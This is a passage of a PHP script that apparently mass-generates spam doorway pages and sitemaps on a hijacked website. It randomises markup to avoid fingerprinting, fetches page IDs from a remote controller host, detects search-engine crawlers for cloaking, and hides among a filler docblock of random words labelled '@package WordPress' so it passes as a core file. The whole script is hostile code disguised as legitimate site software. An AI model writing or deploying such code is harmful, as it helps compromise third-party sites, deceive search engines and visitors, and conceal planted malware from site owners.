$tparrCat = array(); $catArrII = array(); foreach($catArr as $vs){ $vs = str_replace('&','&',$vs); if(!isset($tparrCat[$vs])){ $tparrCat[$vs] = 1; $catArrII[] = $vs; } } $catArr = $catArrII; $mateStr = $temparrI[1]; if(strstr($mateStr,'#keydescription#')){ $temparrII = explode('#keydescription#',$mateStr); $pkeyword = trim($temparrII[0]); if(!$pkeyword){ $pkeyword = $Ptitle; }else{ $keyArr = explode(',',$pkeyword); $num = count($keyArr); $yushu = KEYJG % $num; $arrPre = array(); $arrLast = array(); for($i=0;$i<$num;$i++){ if($i<$yushu){ $arrLast[] = $keyArr[$i]; }else{ $arrPre[] = $keyArr[$i]; } } if(count($arrLast)){ foreach($arrLast as $vs){ $arrPre[] = $vs; } } $pkeyword = implode(',',$arrPre); $pkeywordYuanShi = $pkeyword; } $pdescription = trim($temparrII[1]); if(!$pdescription){ $falgMateDes=1; }else{ $DesArr = explode(',',$pdescription); $num = count($DesArr); $yushu = KEYJG % $num; $arrPre = array(); $arrLast = array(); for($i=0;$i<$num;$i++){ if($i<$yushu){ $arrLast[] = $DesArr[$i]; }else{ $arrPre[] = $DesArr[$i]; } } if(count($arrLast)){ foreach($arrLast as $vs){ $arrPre[] = $vs; } } if(count($nowMateAddArr)){ foreach($nowMateAddArr as $vs){ $arrPre[] = $vs; } } $pdescription = implode(',',$arrPre); $pDescriptionYuanShi = $pdescription; } }else{ $pkeyword = $Ptitle; $falgMateDes=1; } }else{ $catArr = array(); if(strstr($mateStr,'#keydescription#')){ $temparrII = explode('#keydescription#',$mateStr); $pkeyword = $temparrII[0]; if(!$pkeyword){ $pkeyword = $Ptitle; }else{ $keyArr = explode(',',$pkeyword); $num = count($keyArr); $yushu = KEYJG % $num; $arrPre = array(); $arrLast = array(); for($i=0;$i<$num;$i++){ if($i<$yushu){ $arrLast[] = $keyArr[$i]; }else{ $arrPre[] = $keyArr[$i]; } } if(count($arrLast)){ foreach($arrLast as $vs){ $arrPre[] = $vs; } } $pkeyword = implode(',',$arrPre); $pkeywordYuanShi = $pkeyword; } $pdescription = trim($temparrII[1]); if(!$pdescription){ $falgMateDes=1; }else{ $DesArr = explode(',',$pdescription); $num = count($DesArr); $yushu = KEYJG % $num; $arrPre = array(); $arrLast = array(); for($i=0;$i<$num;$i++){ if($i<$yushu){ $arrLast[] = $DesArr[$i]; }else{ $arrPre[] = $DesArr[$i]; } } if(count($arrLast)){ foreach($arrLast as $vs){ $arrPre[] = $vs; } } if(count($nowMateAddArr)){ foreach($nowMateAddArr as $vs){ $arrPre[] = $vs; } } $pdescription = implode(',',$arrPre); $pDescriptionYuanShi = $pdescription; } }else{ $pkeyword = $Ptitle; $falgMateDes=1; } } if($falgMateDes){ $desPosition = (KEYJG + $id23) % 6; if($desPosition == 0) $pdescription = $Ptitle .' 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' .$arrTopStrs[$fistKey] .', '. $arrTopStrs[$secondKey] .', '. $arrTopStrs[$threeKey] .', '. $arrTopStrs[$fourKey] .'.

' . PHP_EOL; $tempKeyArr = array(); $tempKeyArr[$randTkeyI] = 1; $tempKeyArr[$randTkeyII] = 1; $keyJg = ($id23 + KEYJG) % 3 + 1; $bgKeyNs = ($id23 + KEYJG) % $numTitleArr; for($i=0;$i<20;$i++){ if(!isset($tempKeyArr[$bgKeyNs]) && !isset($randTkeyIII)){ $randTkeyIII = $bgKeyNs; $tempKeyArr[$randTkeyIII] = 1; }elseif(!isset($tempKeyArr[$bgKeyNs])){ $randTkeyIIII = $bgKeyNs; $tempKeyArr[$randTkeyIIII] = 1; break; } $bgKeyNs = ($bgKeyNs + $keyJg) % $numTitleArr; } if(!isset($randTkeyIII)) $randTkeyIII = $randTkeyI; if(!isset($randTkeyIIII)) $randTkeyIIII = $randTkeyII; $createTitleIII = getRandStrArr($tpTitleArr,$randTkeyIII); $createTitleIIII = getRandStrArr($tpTitleArr,$randTkeyIIII); $arrLastStrs = array(); $arrLastStrs[] = $createTitleIII; $arrLastStrs[] = $createTitleIIII; $arrLastStrs[] = '###nowtitles###'; $fistKey = ($id23 + RANDNUMI) % count($arrLastStrs); $secondKey = ($id23 * RANDNUMII) % count($arrLastStrs); if($fistKey == $secondKey){ $secondKey = ($fistKey + 1) % count($arrLastStrs); } foreach($arrLastStrs as $key=>$vs){ if($key != $fistKey && $key != $secondKey){ $threeKey = $key; } } $footAddStrII = '

' . $arrLastStrs[$fistKey] .', '. $arrLastStrs[$secondKey] .', '. $arrLastStrs[$threeKey] .'.

' . PHP_EOL; $addTopStr = ''; $addTopStr .= $headAddStr; $addTopStr .= "


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".PHP_EOL; } } if(isset($InFoStrArr['pdes'])){ $InFoStrArr['pdes'] = preg_replace('#\s+#si',' ',$InFoStrArr['pdes']); $addStrII .= '


".PHP_EOL; } $addTopStr .= $addStrII; $tpaddstr = ''; $tpaddstr .= "


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".PHP_EOL; } } $arrFlinks = array(); $fr1Strs = ''.PHP_EOL; if(isset($fr2Arr)){ $fr2Strs = ''.PHP_EOL; } $addPdesStrII = ''; $addPdesStrII .= "


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'.PHP_EOL; } $addPdesStr = ''; $addStrDesII = ''; if(isset($InFoStrArr['fpNameStr'])){ $Random = (KEYJG + $id23) % 2 == 0 ? 3 : 2 ; $tpDesNameArr = unserialize($InFoStrArr['fpNameStr']); $tempArrLen = count($tpDesNameArr) - 1; $temp_arr = array(); foreach($tpDesNameArr as $tpdesKey=>$tpdesVs){ if(strstr($tpdesVs,'#cat#')){ $tp_name_arr = explode('#cat#',$tpdesVs); $tpdesVs = $tp_name_arr[1]; } $temp_arr[$tpdesKey] = $tpdesVs; } $tpDesNameArr = $temp_arr; $lenthNameArr = count($tpDesNameArr); $lenthFlinkArr = $Random; $numShan = intval($lenthNameArr/$lenthFlinkArr); if($numShan < 1) $numShan = 1; $flag = 0; $shengyu = $lenthNameArr - $lenthFlinkArr * $numShan; $shengyu = $shengyu - 2; $bgnum = 0; $endnum = $lenthNameArr - 1; $arrKeyNum = array(); while($shengyu > 0){ $arrKeyNum[$bgnum++] = $numShan + 1; $shengyu--; if($shengyu > 0){ $arrKeyNum[$endnum--] = $numShan + 1; } $shengyu--; } $nowTempFlag = 0; $nowTempNumFlag = 0; $tempDesNameArr = array(); foreach($tpDesNameArr as $tpdesKey=>$tpdesVs){ $nowLens = isset($arrKeyNum[$nowTempFlag]) ? $arrKeyNum[$nowTempFlag] : $numShan; if($nowTempNumFlag < $nowLens){ $tempDesNameArr[] = $tpdesVs; $nowTempNumFlag++; }else{ $tempDesNameArr[] = "{$Ptitle}"; $nowTempFlag++; $tempDesNameArr[] = $tpdesVs; $nowTempNumFlag=1; } } while($nowTempFlag <= $lenthFlinkArr-1){ $nowTempFlag++; $tempDesNameArr[] = "{$Ptitle}"; } $tpDesNameArr = $tempDesNameArr; $i=0; foreach($tpDesNameArr as $tpdesKey=>$tpdesVs){ $tempLen = strlen($tpdesVs) + $i; if($tempLen % 2 == 1){ $nowtempfh = ', '; }else $nowtempfh = '. '; if($i == $tempArrLen){ $addStrDesII .= $tpdesVs . '.'; }else{ $addStrDesII .= $tpdesVs . $nowtempfh; } $i++; } $addStrDesII = '


'.PHP_EOL; } $tpaddstr = $tpaddstr . PHP_EOL . $addStrDesII ."
"; $addPdesStr .= "


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"; $thisPnameLink = ''.$nowIdName.''; $thisPnameLink2 = ''.$nowIdName.''; $thisTitleLink = ''.$Ptitle.''; $flagH2I = 1; $flagH2II = 1; $flagH2III = 1; $fileMb = fopen("template.html","r"); $html = fread($fileMb,filesize("template.html")); $numBz = 0; $titleKeys = KEYJG % 6; $catUseKey = (KEYJG + $id23) % count($catArr); $catUseKeyTwo = ((KEYJG+1) * $id23) % count($catArr); if($catUseKey == $catUseKeyTwo) $catUseKeyTwo = ($catUseKeyTwo + 1) % count($catArr); $flagCatThree = 0; if(count($catArr) >= 3){ foreach($catArr as $key=>$vs){ if($key != $catUseKey && $key != $catUseKeyTwo) $catUseKeyThree = $key; } $catPos = (KEYJG + $id23) % 2; if($catPos){ $catStr = $catArr[$catUseKeyTwo] .' '. $catArr[$catUseKeyThree]; }else{ $catStr = $catArr[$catUseKeyThree] .' '. $catArr[$catUseKeyTwo]; } }else{ $catStr = $catArr[$catUseKeyTwo]; } $catPreStr = $catArr[$catUseKey]; if(preg_match('#.*\.(.*)\..*#i',$thisdom)) $usdomStr = preg_replace('#.*\.(.*)\..*#i','\1',$thisdom); else $usdomStr = preg_replace('#(.*)\..*#i','\1',$thisdom); $titlePosition = (KEYJG + $id23) % 6; if($titlePosition == 0) $nowShowTitle = $Ptitle .' '. $catStr .' '. $catPreStr; elseif($titlePosition == 1) $nowShowTitle = $catPreStr .' '. $Ptitle .' '. $catStr; elseif($titlePosition == 2) $nowShowTitle = $Ptitle .' '. $catStr .' '. $catPreStr; elseif($titlePosition == 3) $nowShowTitle = $catPreStr .' '. $catStr .' '. $Ptitle; elseif($titlePosition == 4) $nowShowTitle = $catStr .' '. $Ptitle .' '. $catPreStr; elseif($titlePosition == 5) $nowShowTitle = $catStr .' '. $catPreStr .' '. $Ptitle; else $nowShowTitle = $Ptitle; $pdescription = trim($pdescription); $addTopStr = str_replace('###nowtitles###',$Ptitle ,$addTopStr); $tpaddstr = str_replace('###nowtitles###',$Ptitle,$tpaddstr); $footAddStrII = str_replace('###nowtitles###',$Ptitle,$footAddStrII); $html = str_ireplace('draft_or_post_title', $nowShowTitle, $html); $html = str_ireplace('#bbbkeybbb#', $pkeyword . $addKeyWordStr, $html); $html = str_ireplace('#bbbdesbbb#', $pdescription, $html); $html = str_ireplace('#bbb1content1bbb#', $addTopStr, $html); // $html = str_ireplace('#bbb2content2bbb#', $artArr[1], $html); if(strstr($html,'#link3#')) if($flagH2I){ $html = str_replace('#link3#',$addPdesStrII ,$html); $flagH2I = 0; }else{ $html = str_replace('#link3#','',$html); } if(strstr($html,'#flink#')) if($flagH2I){ $html = str_replace('#flink#',$addPdesStrII ,$html); $flagH2I = 0; }elseif($flagH2II){ $html = str_replace('#flink#',$addPdesStr, $html); $flagH2II = 0; }else{ $html = str_replace('#flink#','',$html); } if(strstr($html,'#link4#')) if($flagH2I){ $html = str_replace('#link4#',$addPdesStrII ,$html); $flagH2I = 0; }elseif($flagH2II){ $html = str_replace('#link4#',$addPdesStr, $html); $flagH2II = 0; }elseif($flagH2III){ $html = str_replace('#link4#','',$html); $flagH2III = 0; }else{ $html = str_replace('#link4#','',$html); } if(strstr($html,'#link5#')) if($flagH2I){ $html = str_replace('#link5#',$addPdesStrII ,$html); $flagH2I = 0; }elseif($flagH2II){ $html = str_replace('#link5#',$addPdesStr, $html); $flagH2II = 0; }elseif($flagH2III){ $html = str_replace('#link5#','',$html); $flagH2III = 0; }else{ $html = str_replace('#link5#','',$html); } if(strstr($html,'#Flink2#')) if($flagH2I){ $html = str_replace('#Flink2#',$addPdesStrII ,$html); $flagH2I = 0; }elseif($flagH2II){ $html = str_replace('#Flink2#',$addPdesStr, $html); $flagH2II = 0; }elseif($flagH2III){ $html = str_replace('#Flink2#','',$html); $flagH2III = 0; }else{ $html = str_replace('#Flink2#','',$html); } $lastAddStrs = ''; if($flagH2I){ $lastAddStrs .= $addPdesStrII . PHP_EOL; } if($flagH2II){ $lastAddStrs .= $addPdesStr. PHP_EOL; } if($lastAddStrs){ $tpaddstr = $tpaddstr .PHP_EOL . $lastAddStrs; } $html = str_ireplace('#bbb2content2bbb#', '', $html); $html = str_ireplace('#descontent#', $tpaddstr, $html); $html = str_replace('#link1#','',$html); $html = str_replace('#link2#','',$html); $footKey = "


". PHP_EOL ."{$footAddStrII}".PHP_EOL; $html = str_replace('> ',$catArr); // $catArr= array(); // if($catstr) // $catArr[] = $catstr; $arrBreadNum = count($arrBread); $domlen = strlen($thisdom); $breadTagkey = $domlen % 5; $liClassYs = KEYJG % 19; if($liClassYs == 0){ $liStr = ' class="item"'; }elseif($liClassYs == 1){ $liStr = ' class="breadcrumbs-item"'; }elseif($liClassYs == 2){ $liStr = ' class="nz-breadcrumb-item"'; }elseif($liClassYs == 3){ $liStr = ' class="items"'; }elseif($liClassYs == 4){ $liStr = ' class="breadcrumblist-items"'; }elseif($liClassYs == 5){ $liStr = ' class="el-breadcrumb-item"'; }elseif($liClassYs == 6){ $liStr = ' class="doc-crumb-item"'; }elseif($liClassYs == 7){ $liStr = ' class="breadcrumb-item"'; }elseif($liClassYs == 8){ $liStr = ' class="crumbs-item"'; }elseif($liClassYs == 9){ $liStr = ' class="bread-item"'; }elseif($liClassYs == 10){ $liStr = ' class="breads-item"'; }elseif($liClassYs == 11){ $liStr = ' class="breadcrumbItem"'; }elseif($liClassYs == 12){ $liStr = ' class="breadcrumbItems"'; }elseif($liClassYs == 13){ $liStr = ' class="breadcrumblistitems"'; }elseif($liClassYs == 14){ $liStr = ' class="BreadcrumbItem"'; }elseif($liClassYs == 15){ $liStr = ' class="ListItem"'; }elseif($liClassYs == 16){ $liStr = ' class="crumb-items"'; }else{ $liStr = ''; } $arrBreadId = array(); $arrBreadId[] = 'Bread'; $arrBreadId[] = 'BreadHead'; $arrBreadId[] = 'Breadcrumb'; $arrBreadId[] = 'Breadcrumb-Head'; $arrBreadId[] = 'Breadcrumb-Heads'; $arrBreadId[] = 'Breadcrumb-Top'; $arrBreadId[] = 'BreadcrumbHeads'; $arrBreadId[] = 'BreadcrumbLists'; $arrBreadId[] = 'BreadcrumbNavigation'; $arrBreadId[] = 'BreadcrumbTop'; $arrBreadId[] = 'BreadcrumbTops'; $arrBreadId[] = 'MyBreadcrumb'; $arrBreadId[] = 'ant-breadcrumb'; $arrBreadId[] = 'bread-List'; $arrBreadId[] = 'breadtop'; $arrBreadId[] = 'breadtops'; $arrBreadId[] = 'breadHead'; $arrBreadId[] = 'breadHeads'; $arrBreadId[] = 'breadList'; $arrBreadId[] = 'breadLists'; $arrBreadId[] = 'breadcrumb'; $arrBreadId[] = 'c-breadcrumb'; $arrBreadId[] = 'crumbList'; $arrBreadId[] = 'crumb-list'; $arrBreadId[] = 'crumbs'; $arrBreadId[] = 'crumbsHead'; $arrBreadId[] = 'crumbsHeads'; $arrBreadId[] = 'crumbs-head'; $arrBreadId[] = 'crumbs-nag'; $arrBreadId[] = 'crumbsTop'; $arrBreadId[] = 'crumbsTops'; $arrBreadId[] = 'crumbs-top'; $arrBreadId[] = 'cs-breadcrumb'; $arrBreadId[] = 'customBreadcrumb'; $arrBreadId[] = 'doc-crumb'; $arrBreadId[] = 'el-breadcrumb'; $arrBreadId[] = 'l-breadcrumb'; $arrBreadId[] = 'navBreadCrumb'; $arrBreadId[] = 'navBreadCrumbs'; $arrBreadId[] = 'page-breadcrumbs'; $arrBreadId[] = 'pages-breadcrumbs'; $arrBreadId[] = 's-breadcrumb'; $arrBreadId[] = 'v-breadcrumb'; $arrBreadId[] = 'chrome-breadcrumbs'; $keyBreadId = KEYJG % 48; if(isset($arrBreadId[$keyBreadId])){ $keyBreadIdStr = ' id="'.$arrBreadId[$keyBreadId].'"'; }else{ $keyBreadIdStr = ''; } $strBreads = ''; if($breadTagkey == 4){ $arrBreadC1 = array(); $arrBreadC1[] = 'BreadcrumbData'; $arrBreadC1[] = 'BreadcrumbDatas'; $arrBreadC1[] = 'BreadcrumbTop'; $arrBreadC1[] = 'crumbsHead'; $arrBreadC1[] = 'crumbsTop'; $arrBreadC1[] = 'crumbsList'; $arrBreadC1[] = 'crumbs-top'; $arrBreadC1[] = 'crumbs-list'; $arrBreadC1[] = 'crumbs-Head'; $arrBreadC1[] = 'BreadcrumbTag'; $arrBreadC1[] = 'Breadcrumb-tag'; $arrBreadC1[] = 'BreadcrumbBody'; $arrBreadC1[] = 'BreadcrumbBody'; $arrBreadC1[] = 'Breadcrumb-Top'; $arrBreadC1[] = 'Breadcrumb-body'; $arrBreadC1[] = 'BreadcrumbTops'; $arrBreadC1[] = 'Breadcrumb-Head'; $arrBreadC1[] = 'Breadcrumb-Heads'; $arrBreadC1[] = 'Breadcrumb-List'; $arrBreadC1[] = 'BreadcrumbList'; $arrBreadC1[] = 'BreadcrumbLists'; $ckeyI = KEYJG % count($arrBreadC1); $classI = $arrBreadC1[$ckeyI]; $classII = $domlen % 2 ? 'Breadcrumbs' : 'Breadcrumb'; $strBreads .= '<'.$breadTagHtml1.$keyBreadIdStr.' class="'.$classI.'">'; $strBreads .= '<'.$breadTagHtml2.' class="'.$classII.'">'; $strBreads .= 'Home'; if(count($catArr)){ foreach($catArr as $vs){ $vs = trim($vs); $nowCatUrl = getCatLink($vs,$id23); $strBreads .= ''.$vs.''; } } $nowUrl = getalink($id23,$pname); $strBreads .= ''.$Ptitle.''; // $strBreads .= ''.$Ptitle.''; $strBreads .= ''; $strBreads .= ''; }else{ $calssBreadKey = KEYJG % $arrBreadNum; $classTop = $arrBread[$calssBreadKey]; $classul = KEYJG % 2 ? 'Breadcrumb' : 'breadcrumbs'; $breadTagkey = $domlen % 2; if($breadTagkey == 0){ if($classTop) $strBreads .= '<'.$breadTagHtml1.$keyBreadIdStr.' class="'.$classTop.'">'; else $strBreads .= '<'.$breadTagHtml1.$keyBreadIdStr.'>'; $strBreads .= '<'.$breadTagHtml2.' class="'.$classul.'" itemscope itemtype="http://schema.org/BreadcrumbList">'; $strBreads .= 'Home'; $flagNum = 2; if(count($catArr)){ foreach($catArr as $vs){ $vs = trim($vs); $nowCatUrl = getCatLink($vs,$id23); $strBreads .= ''.$vs.''; $flagNum++; } } $nowUrl = getalink($id23,$pname); // $strBreads .= ''.$Ptitle.''; $strBreads .= ''.$Ptitle.''; $strBreads .= ''; $strBreads .= ''; }else{ if($classTop) $strBreads .= '<'.$breadTagHtml1.$keyBreadIdStr.' class="'.$classTop.'">'; else $strBreads .= '<'.$breadTagHtml1.$keyBreadIdStr.'>'; $strBreads .= '<'.$breadTagHtml2.' class="'.$classul.'" itemscope itemtype="http://schema.org/BreadcrumbList">'; $strBreads .= ''; if(count($catArr)){ foreach($catArr as $vs){ $vs = trim($vs); $nowCatUrl = getCatLink($vs,$id23); $strBreads .= ''; } } $nowUrl = getalink($id23,$pname); $strBreads .= ''.$Ptitle.''; // $strBreads .= ''.$Ptitle.''; $strBreads .= ''; $strBreads .= ''; } } return $strBreads; } function get_scheme(){ if ( (isset($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (isset($_SERVER['HTTP_CF_VISITOR']) && strstr($_SERVER['HTTP_CF_VISITOR'],'https')) || (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443') ) { $httpPre= 'https'; } else { $httpPre = 'http'; } return $httpPre; } function get_shares(){ $siteLink= get_scheme() .'://'.$_SERVER['HTTP_HOST']; $shareStr = ' '; $shareStr = str_replace('domain',$siteLink,$shareStr); return $shareStr; } function getCatLink($CatName,$id23){ global $arrnametime,$arrKeywz,$date_string; $filePres = ''; $fileEnds = ''; $siteLink= get_scheme() .'://'.$_SERVER['HTTP_HOST']; $dirNames = dirname(__FILE__); $httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames))); if(JDT == 2){ $filePres = $siteLink ."/". $httcReplace . "/" . basename(__FILE__) . "/"; }elseif(JDT == 1){ $filePres = $siteLink ."/". $httcReplace . "/"; }elseif(JDT == 3){ $filePres = $siteLink ."/". $httcReplace . "/" .basename(__FILE__) . "?cat="; }else{ $filePres = $siteLink."/"; } $CatName = str_replace('&',' ',$CatName); $CatName = str_replace('&',' ',$CatName); if(JDT == 3){ $CatName = preg_replace('#\s+#i','-',$CatName); while(strstr($CatName,'--')) $CatName = str_replace('--','-',$CatName); $urlMid = $CatName; $rtStr = $filePres.$urlMid; $rtStr = str_replace($filePres.'-',$filePres,$rtStr); return $rtStr; } // BZCAT global $tpKeyStrCat; $endNumber = ''; $tpNum = KEYJG * $id23; $tpKey = $tpNum % count($date_string); $lenStr = strlen($date_string[$tpKey]); if($tpKeyStrCat == -1) $tpKeyStrCat = (KEYJG + $pid) % $lenStr; $tpstr = $date_string[$tpKey]; $randStr = ''; $arrNum = array(); for($i = 0; $i < $lenStr; $i++){ $vs = $tpstr{$tpKeyStrCat}; $int_vs = ord($vs); if($int_vs >= 100 and $int_vs <= 119){ $arrNum[] = $int_vs % 10; if(count($arrNum) >= 3){ break; } } $tpKeyStrCat = ($tpKeyStrCat + 1) % $lenStr; } $catNum = implode('',$arrNum); $CatName = preg_replace('#\s+#i','-',$CatName); $CatName = str_replace('--','-',$CatName); $urlMid = str_replace('--','-',$CatName) . ''; // $urlMid .= JTHZ; $rtStr = $filePres.'catalog'. '-' .$urlMid . JTHZ; $rtStr = str_replace($filePres.'-',$filePres,$rtStr); return $rtStr; } function getMapNum($bgNum,$mapnum){ $TempArr = array(); if($bgNum + $mapnum <= FNUM){ for($i=0;$i<$mapnum;$i++){ $TempArr[$i] = $bgNum + $i -1; } }else{ for($i=0;$i<$mapnum;$i++){ if($bgNum+$i > FNUM) $TempArr[$i] = $bgNum + $i -1 -FNUM; else $TempArr[$i] = $bgNum + $i -1; } } return $TempArr; } function getRandCId($rqurl){ global $thisdom; for($i=0;$i<3;$i++){ $idUrl = GETDOM . "gpage.php?site=$thisdom&cid=$rqurl"; $tempIdStr = curl_get_from_webpage($idUrl,'',5); if(preg_match('#(\d+)#i',$tempIdStr,$matchId)){ return $matchId[1]; } } http_response_code(404); exit; } /** * flock generate index optimistic partial valid wealthy withdraw. * adopt appeal approach durable entitle gene glimpse grand interpret loosen origin pants passive presumably profitable reliable restrain revenue sensitive simplicity substantial ultimate wealthy witness. * academic adapt appoint authority coach marveous peak racial universal violent weave. * applicable aware coach community continuous drip extent flash highlight lean mission outset partial primitive prominent resemble resolve scale sensitive valid version whatsoever. * defect encounter exclude inhabitant modify optics particle passion tendency vacuum vocabulary volume. * capture kneel mood quit vital. * conservative device drip entitle exclusive expend flee focus gallery junior manufacture petroleum resistant retail spray stale universal waist. * approach attitude burst campus compete conservation distinguish durable episode exclude ferfile flash genius gesture glimpse global glory semiconductor timber wander. * architect available clue competent drip globe individual massive modify passive petrol precaution promote resolve secure terminal urgent vertical victim. * advertise arouse awful bargain comment dispose diverse gesture phenomenon reveal splendid subway talent transform virus yawn. * abundant acknowledge bargain bother elaborate golf motive offend poverty reveal ridge shrug significance valley. * arise aspect bargain barrel decade entertainment essential expenditure genuine global inhabitant jungle oblige partial petroleum prescribe previous ridge sensible undergo urban vibrate wagon. * automatic bargain comedy deserve golf prevail quit substantial. * abuse career opponent whatsoever. * abundant burst estimate interfere optimistic seminar virtue. * abundant dusk emphasize glimpse mature notion retail stuff victim. * battery consent moral restraint sketch sorrow strategic yawn. * alter cancel career comment community dash deaf discrimination estimate ferfile glory jeans leak magnet mist orient simplify stuff tendency terror treaty. * adapt aspect decorate fertilizer genius male necessity spill. * acid adopt agent barrel debate display emotional grateful illusion recreation relief ridge sake semiconductor shrink slender spill tremble ultimate vocabulary zone. * appreciate consent continual discipline generate guarantee interfere leak liquor liter manual maximum merchant mild passion quit respond retail temple theme tremendous urgent variation vivid. * gallon powder secure slip. * advertisement comedy extraordinary hint nuisance oval participate personnel reject sensitive. * essential female frown hint internal jealous likelihood male outstanding partial prescribe presumably prevail prior recruit reject semiconductor severe shallow spit temple transform usage virtue virus. * response career casual constant continuous equivalent integrate interpret laser preserve religious restrict retail. * arbitrary attitude candidate expensive fatal geography interpret jeans likelihood parallel textile welfare. * adequate approximate competition data decline discipline equivalent estimate evolution expense exterior inhabitant naval pants peak reputation resolve shift tendency urgent. * excursion expenditure explore participate particularly respond restrict subway temporary. * response burst enviroment import leak portion profitable version. * agent applicant capture community neutral outset theme vocabulary withstand. * approach coarse exaggerate licence promote semiconductor shuttle. * academic acquire attach bachelor balcony debt deserve device discount domestic evolve ferfile gallon garbage hence register ridiculous timber title. * architecture aware cliff coarse data deaf dumb earthquake emotion enviroment identify import liberal maximum moist mood motivate necessity notion particularly presumably stimulate vary wax welfare. * breadth delicate diverse exaggerate genuine highlight mainland obstacle prior prominent spill substantial swallow vacant variation. * absolute compete competition constant drip emphasize geometry kneel luxury missile numerrous orient retain ridid scratch substantial subt. * response award catalog discrimination diverse entitle evil faulty flexible glorious illegal inhabitant insignificant insurance mainland nuisance pants partial private respond stripe valley wax. * arbitrary burden burst coil evolve glorious nevertheless offend origin prescribe range slippery stimulate target. * forbid nuclear obscure outstanding title videotape. * applicable beforehand explode gallon jam recreation secure transport twist waist. * appetite bargain expense hollow loose nevertheless passive powder restrain slide tremble tuition venture. * acquire approve aspect deposit explosive genuine golf horror label lean marveous motivate particularly relevant rival slippery stimulate subsequent utilify virtual welfare yawn zone. * agent ban device discipline dispose distinguish domestic fatal focus passion prevail quotation respond restrain strategy swallow. * continuous marveous merchant nonsense principal relevant spill. * campus decorate evolution exaggerate leap navigation shiver sincere stimulate volcano wander. * consume orbit revenue vibrate. * * @package WordPress */ function getRandId(){ $num = rand(1,FNUM); $num = $num - 1; require(FILEDIRNAME . "/id$num.php"); $indexId=array_rand($arrId,1); $id = $arrId[$indexId]; unset($arrId); return $id;} function get_arrvs($arr,$num,$nowkey){ $numArr = count($arr); if($nowkey + $num < $numArr) return $arr[$nowkey + $num]; else{ if($nowkey + $num - $numArr - $numArr > 0) return get_arrvs($arr,$num - $numArr,$nowkey); else return $arr[abs($nowkey + $num - $numArr)]; } } function get_pre_link($arr,$key){ $tmpA1 = array(); $tmpA2 = array(); $num = count($arr); if($key + JGNUM + 1 + LINKNUM >= $num){ if($key + JGNUM + 1 - $num > LINKNUM){ return array_slice($arr, $key + JGNUM + 1 - $num, LINKNUM); }else{ $duoyu = $key + JGNUM + 1 + LINKNUM - $num + 1; $tmpA1 = array_slice($arr, $key + JGNUM + 1, LINKNUM); $tmpA2 = array_slice($arr, 0, $duoyu); return array_merge($tmpA1,$tmpA2); } }else{ return array_slice($arr, $key + JGNUM + 1, LINKNUM); } } function get_next_link($arr,$key){ $tmpA1 = array(); $tmpA2 = array(); $num = count($arr); if($key - JGNUM - LINKNUM < 0 && $key - JGNUM > 0){ $duoyu = abs($key - JGNUM - LINKNUM); $tmpA1 = array_slice($arr, 0, abs($key - JGNUM)); $tmpA2 = array_slice($arr, $num-$duoyu-1, $duoyu); return array_merge($tmpA1,$tmpA2); }else{ return array_slice($arr, $key - JGNUM - LINKNUM, LINKNUM); } } function rFile($file){ if(function_exists('file_get_contents')){ return file_get_contents($file); }else{ $handle = fopen($file, "r"); $contents = fread($handle, filesize($file)); fclose($handle); return $contents; } } function isCrawler() { $agent= @strtolower($_SERVER['HTTP_USER_AGENT']); if (!empty($agent)) { $spiderSite= array( "Googlebot", "Mediapartners-Google", "Adsbot-Google", "Yahoo!", "Google AdSense", "Yahoo Slurp", "bingbot", "MSNBot" ); foreach($spiderSite as $val) { $str = strtolower($val); if (strpos($agent, $str) !== false) { return true; } } } else { return false; } } function gsitemap2($filenames,$c=1,$jdt=1){ global $gnumber,$arrArrr; $arrABC = range('a','z'); $tparrsI = $filenames; $randnum = rand(7000,7600); $tparrII = array_rand($tparrsI,$randnum); $tparrIII = array(); foreach($tparrII as $vs){ $tparrIII[$vs] = $filenames[$vs]; } $filenames = $tparrIII; $filePres = ''; $fileEnds = ''; $dirNames = dirname(__FILE__); $httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames))); if(JDT == 2){ $filePres = $httcReplace . "/" . basename(__FILE__) . "/"; }elseif(JDT == 1){ $filePres = $httcReplace . "/"; }elseif(JDT == 3){ $filePres = $httcReplace . "/" .basename(__FILE__) . "?key="; }else{ $filePres = ''; } if(JDT == 3){ $fileEnds = ''; }else{ $fileEnds = JTHZ; } $fpath=get_scheme() .'://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $serpath=substr($fpath,0,strrpos($fpath,'/')); $siteLink=get_scheme() .'://'.$_SERVER['HTTP_HOST']; $mapPre = '<'.'?xml version="1.0" encoding="UTF-8" ?'.'>'. PHP_EOL.'' . PHP_EOL; $mapEnd = PHP_EOL . ''; // $urlsArray = $filenames; // $numLinks = count($urlsArray); $star = 0; $priority = 0.1; $starPri = 0; $gFile =""; $date = date("Y-m-d"); $time = date("H:i:s"); $str = ""; $tempArr1 = $filenames; foreach($tempArr1 as $key => $value2){ $curphp=basename(__FILE__); $value = $value2; $first=stristr($value,".php"); $last=stristr($value,".xml"); $checkTxt =stristr($value,".txt"); $tempPid = $key; $url = getalink($tempPid,$value2); if(JDT == 0){ if($first===false && $last===false && $checkTxt===false) { $date = date("Y-m-d"); $time = date("H:i:s"); if($star % 12000==11999){ $gFile = '../mapper/write' . $arrABC[$gnumber-2] . 'map' .'.xml'; echo '
'; $put_str = $mapPre . $str . $mapEnd; @unlink($gFile); file_put_contents($gFile,$put_str); file_put_contents("./map.log",'#write' . $arrABC[$gnumber-2] . 'map' .'.xml#'.PHP_EOL,FILE_APPEND); $str = ''; $gnumber++; return; } $str .= " " . $url . " ". $date . "T" . $time ."-05:00 daily 0.1 "; $star++; $starPri++; } }else{ if($first===false && $last===false && $checkTxt===false) { $date = date("Y-m-d"); $time = date("H:i:s"); if($star % 12000==11999){ $gFile = '../mapper/write' . $arrABC[$gnumber-1] . 'map' .'.xml'; echo '
